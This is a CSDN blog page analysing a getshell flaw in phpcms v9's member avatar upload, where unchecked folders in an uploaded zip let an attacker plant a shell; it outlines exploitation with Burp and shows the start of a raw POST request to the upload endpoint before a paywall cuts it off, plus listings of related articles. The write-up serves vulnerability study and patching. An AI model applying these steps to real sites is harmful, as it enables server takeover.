phpcms 会员头像h5上传_phpcms v9前台会员中心上传头像可getshell及修复

最新推荐文章于 2023-04-18 16:25:07 发布
最新推荐文章于 2023-04-18 16:25:07 发布
阅读量331 收藏
点赞数
文章标签: phpcms 会员头像h5上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39631301/article/details/111970065
版权
本文介绍了phpcms V9前台会员中心上传头像存在的getshell漏洞,详细阐述了利用过程和漏洞成因。通过分析代码,发现解压头像时没有递归检查和删除文件夹,导致可以构造特殊zip文件获取shell。修复方案是加强文件内容检查并删除多余文件夹。
摘要由CSDN通过智能技术生成

这个算杂记吧。难得老衲??乱淮巍W羁?际?1月27号,突然看到一枚补丁。说是前台上传头像可getshell.立马被吸引住了。通过两份补丁的对比,发现在处理压缩包的过程中出现了一段删除当前文件夹下的全部文件夹。然后就菊花一紧。通过通读代码,发现上传的过程是

用户上传头像---通过flash里面的js把当前的头像处理成三张不同的格式,然后压缩

用户点击保存的时候把当前的压缩包直接上传的解包的位置,然后把图像释放出来。然后删除临时文件

利用过程就出来了,上传图片,然后在点击保存的时候进行抓包。然后发送的内容为自己的。

常用的就是burp,把包的内容给清理掉.替换为自己的,构造包的内容为带文件夹的。然后上传就可以了。

1:利用过程

头像上传

POST /coder/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=dc64BlNRU1UCCAkCVVpUBgcHCVIHUFdTVVZRCVcUD1RfBRBGED4CEEZQZlkAQVxdEjVsVRJVB0MOKn4JUTEPBTQFDlVXLAocQG9SUQlzJA HTTP/1.1

Host: w

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=

最低0.47元/天 解锁文章
weixin_39631301
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms 会员头像h5上传_使用elementui的头像上传组件报错
weixin_27653327的博客
01-14 479
不知道是我前端的问题?还是后端的问题?请问这个组件默认就是post传值。对吧?是否需不需要再去设置请求协议什么的呢?`Access to XMLHttpRequest at ‘http://11.11.11.232:8082/api/userinfo/avatar’ from origin ‘http://localhost:8080’ has been blocked by CORS polic...
phpcms_v9 后台上传图片按钮无法点击
06-21
以下是一些关键步骤来修复这个问题: 1. **备份源代码**:在进行任何修改之前,确保先备份原始的PHP CMS v9源代码,以防万一出现问题可以回滚到初始状态。 2. **定位上传代码**:找到PHP CMS v9中处理图片上传的...
PHPCMS 修改flash附件上传 改为H5上传
07-23
现在谷歌不支持PHPCMS flash附件上传,修改为H5附件上传后即可,下载文件覆盖项目原文件即可实现功能,亲测可用,无bug
信息系统安全实验之文件上传漏洞导致主页篡改实验
7xun's space
04-18 3502
服务器端的检查最好使用白名单过滤的方法,这样能防止大小写等方式的绕过,同时还需对%00截断符进行检测,对HTTP包头的content-type也和上传文件的大小也需要进行检查。在某些环境中,用户能上传,但不能访问。文件上传攻击的本质就是将恶意文件或者脚本上传到服务器,专业的安全设备防御此类漏洞主要是通过对漏洞的上传利用行为和恶意文件的上传过程进行检测。(4)配置数据库文件,使用notepad++打开zd\sys\config.php,编辑数据库的账号和密码,数据库的账号默认为root,密码默认为root。
Billu_b0x 靶机 write up任意文件下载 审计出文件包含页面(特定参数)+头像上传图片马getshell 37292内核漏洞提权
YouthBelief的博客
11-30 1814
Billu_b0x 靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘0x03 获取shell0x04 提权0x05 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/billu/Billu_b0x.zip nat模式 0x01 信息收集 IP探测 netdiscover -i eth0 -r 192.168.157.0/24 端口探测 masscan -p 1-65535 --rate 1000 192.168.157.
PHPCMS V9 修改flash上传H5上传方案 attachments.php
03-01
PHPCMS V9 修改flash上传H5上传方案 phpcms 上传功能文件
好用的h5上传插件,可以通过此插件上传资源
最新发布
05-22
好用的h5上传插件,可以通过此插件上传资源
PHPCMS V9 修改flash上传H5上传方案 phpcms上传文件statics下js
03-01
本文将详细讲解如何将PHPCMS V9中的Flash上传组件替换为H5上传方案,并介绍涉及的相关JavaScript库。 首先,Flash上传在移动设备上的支持度较低,且存在安全性问题。H5上传,特别是基于HTML5 File API的上传方式,...
PHPCMS V9用户手册.zip_9T4_phpcms_phpcms v9 手册_phpcms v9手册
09-21
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的...
phpcms_v9_beta_GBK.zip_PHPCMS_V9_beta
09-23
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的...
phpcms H5上传
09-30
由于谷歌浏览器宣布不再支持flash上传的方式,而phpcms默认的正是flash上传,我们只能改为H5上传,此版本使用webuploader.js,感觉这个挺强大,自动识别是否支持h5,如果不支持自动启用flash上传,兼容低版本的浏览器, 改动的文件已经单独拎出来,方便开发者直接替换使用
如何解决phpcms V9后台拿shell时出错问题
09-29
很多新手朋友都遇到过phpcms V9后台拿shell时出错,下面为大家介绍个不错的解决方法,希望对大家有所帮助
代码审计_PHPCMS_V9前台RCE挖掘分析1
08-03
代码审计_PHPCMS_V9前台RCE挖掘分析1
GetShell最快的方法,文件上传的那些套路
qq_42073753的博客
06-03 478
平时我们在做渗透测试的时候,除了挖掘一些常见的漏洞的时候,文件上传点一定是我们要着重注意的。很多站都会提供头像上传,附件上传的功能点,这些点都是我们可以利用的。通过这些点我们可以上传我们的webshell文件,进一步的获取服务器的权限,为我们更进一步打入内网做下基础。所以,文件上传的各种绕过姿势,大家一定要熟练掌握。 upload-labs 1-10pass-1 前端js校验pass-2 后端检测MIMEpass-3 黑名单 .php5后缀绕过pass-4 黑名单 .htaccess文件pass-5
前端头像上传功能实现之普通图片/头像上传 详细解析1【扩展知识FormData对象】
zhangyizuishuai的博客
09-10 4899
上传的图片/头像有两种方案上传 第一种我们不对图片做处理直接上传到服务器端,把图片上传到服务器的img文件夹当中,然后我们把图片的地址信息存储在数据库当中,用图片的时候我们直接调用地址 第二种方案是我们在客户端(因为我们写出来的产品是客户肉眼可见,所以前端又称客户端)把图片转换为base64的格式,然后把图片的base64的内容直接存储在数据库当中,需要用到图片的时候我们直接把数据库内部的图片的base64信息,调用到前端的img标签的src属性当中.方案二我会在头像上传功能的详细解析2当中细细给大家分解实
element-ui实现图片上传功能(前台部分)
m0_51963973的博客
07-25 6732
最近做的项目中需要实现图片上传功能,一开始也不懂,经过一段时间的学习后,终于实现了图片上传功能。我将分为前台与后台两部分与大家一起分享。这篇展示的是前台内容。
代码审计学习phpcms头像上传漏洞
m0_46467017的博客
08-16 1197
究竟是什么原因造成了这个漏洞,究其根本还是以为你将用户不安全的POST数据写入了文件,并解压到web目录下了。世界上有无数种方法可以避免这个问题,web目录下随便写文件真的好吗?为何你不把压缩包放进tmp目录里,如果上传、解压缩的操作都能在tmp目录里完成,再把我们需要的头像文件拷贝到web目录中,还会有这么麻烦的安全问题吗?phpcms已经彻底抛弃了解压缩的方式,直接在前端将图片处理完成后进行上传。......
phpcms 会员头像h5上传_phpcms v9修改flash上传h5上传
weixin_39814482的博客
01-10 165
由于谷歌浏览器宣布不再支持flash上传的方式,而phpcms默认的正是flash上传,官方不在维护,只能有我们自己二开了。网上h5上传的插件真是多的让人眼花缭乱,并且功能都比较齐全,我先选择了uploadfive.js,虽然全部功能都已经实现,但是对附件后缀的处理不是那么完美,后来又改成了百度的webuploader.js,感觉这个挺强大,自动识别是否支持h5,如果不支持自动启用flash上传,...
phpcms v9头像上传改为H5上传(利用cropper.js)
fengye002011的博客
05-18 1157
网上有很多的理由cropper.js开发的h5图片上传,但是大都依赖bootstrap,需要引入他们的东西,感觉太重。另外由于phpcms v9后台修改flash上传h5上传,唯独没有修改头像上传,感觉不太完美,所以专门开发了一下h5头像上传, 具体修改方案参考:https://doc.tengcee.com/other/148.html,代码修改极少,php代码总共修改了5行,帮你快速搞定头像H5上传 目前是对接sso的上传,可以完美实现sso式保存头像 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值